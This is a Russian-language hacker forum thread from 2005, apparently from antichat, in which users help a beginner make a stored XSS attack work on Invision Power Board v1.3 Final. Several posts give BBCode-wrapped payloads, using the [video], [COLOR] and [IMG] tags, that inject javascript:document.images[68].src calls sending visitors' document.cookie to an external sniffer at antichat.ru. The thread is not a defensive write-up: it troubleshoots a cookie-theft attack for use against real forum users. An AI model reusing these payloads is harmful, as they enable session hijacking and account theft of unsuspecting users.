Форумы Вопрос по использованию XSS на Powered by Invision Power Board(U) v1.3 Final

Discussion in 'Уязвимости CMS/форумов' started by rsha1988, 31 Jan 2005.

  1. rsha1988

    rsha1988 Elder - Старейшина

    Joined:
    3 Jan 2005
    Messages:
    231
    Likes Received:
    3
    Reputations:
    0
    В форуме Powered by Invision Power Board(U) v1.3 Final © 2003 IPS, Inc.
    вставляю :
    '>` style=background:url(javascript:document.images[68].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)
    И чето не каких кук в снифере не вижу!
    Что я сделал неправильно? :confused:
     
  2. Del

    Del New Member

    Joined:
    24 Jan 2005
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    В файнале фильтруются многие символы...
    Посмотри Html
    Кстати фильтр мешает ещё и спаренные тэги использовать
     
  3. rsha1988

    rsha1988 Elder - Старейшина

    Joined:
    3 Jan 2005
    Messages:
    231
    Likes Received:
    3
    Reputations:
    0
    А можно чуть чуть по подробнее?
    Я вставляю в сообщение эту фигню:
    '>` style=background:url(javascript:document.images[68].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)
    и она не меняеться не фига когда попадает в тему, так же и остаеться!
     
  4. Del

    Del New Member

    Joined:
    24 Jan 2005
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    А к какому тэгу у тебя style в итоге относится?
     
  5. rsha1988

    rsha1988 Elder - Старейшина

    Joined:
    3 Jan 2005
    Messages:
    231
    Likes Received:
    3
    Reputations:
    0
    Фиг знает....
    Я же всетаки начанающий...
     
  6. foreva

    foreva HACKFORUM.RU

    Joined:
    5 Feb 2005
    Messages:
    48
    Likes Received:
    10
    Reputations:
    -2
    Вообще-то баг работает через определенные теги!
    например:
    Code:
    [video]http://1.ru e=`[/video]` style=display:none;background:url(javascript:document.images[68].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie) [i]L[/i]ol
    Читай внимательнее инфу на сайте!!
    http://antichat.ru/txt/IPB/
     
  7. byte57

    byte57 Elder - Старейшина

    Joined:
    22 Jan 2005
    Messages:
    568
    Likes Received:
    13
    Reputations:
    24
    rsha1988, напиши как парсится в предпросмотре....
     
  8. rsha1988

    rsha1988 Elder - Старейшина

    Joined:
    3 Jan 2005
    Messages:
    231
    Likes Received:
    3
    Reputations:
    0
    переведи...
     
  9. BlackPrince

    BlackPrince Elder - Старейшина

    Joined:
    13 Oct 2004
    Messages:
    50
    Likes Received:
    7
    Reputations:
    0
    Скажи, что получается в HTML
     
  10. rsha1988

    rsha1988 Elder - Старейшина

    Joined:
    3 Jan 2005
    Messages:
    231
    Likes Received:
    3
    Reputations:
    0
    [video]http://1.ru e=`[/video]` style=display:none;background:none;background:url(javascript:docum ent.images[68].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie) Lol - эт и получаеться!
     
  11. byte57

    byte57 Elder - Старейшина

    Joined:
    22 Jan 2005
    Messages:
    568
    Likes Received:
    13
    Reputations:
    24
    правая кнопка крысы для осла, просмотр html кода и ищи все с втоими данными, как оно спарсилось в предпросмотре...
     
  12. byte57

    byte57 Elder - Старейшина

    Joined:
    22 Jan 2005
    Messages:
    568
    Likes Received:
    13
    Reputations:
    24
    ты тег видео юзаешь?
     
  13. (-=util=-)

    (-=util=-) Banned

    Joined:
    2 Dec 2004
    Messages:
    337
    Likes Received:
    8
    Reputations:
    2
    Это к старым движкам.
    Новое вот
    HTML:
    [COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.images[68].src="http://antichat.ru/cgi-bin/s.jpg?OOOOOOOOOOOOOOO"+document.cookie) [/COLOR]
     
Loading...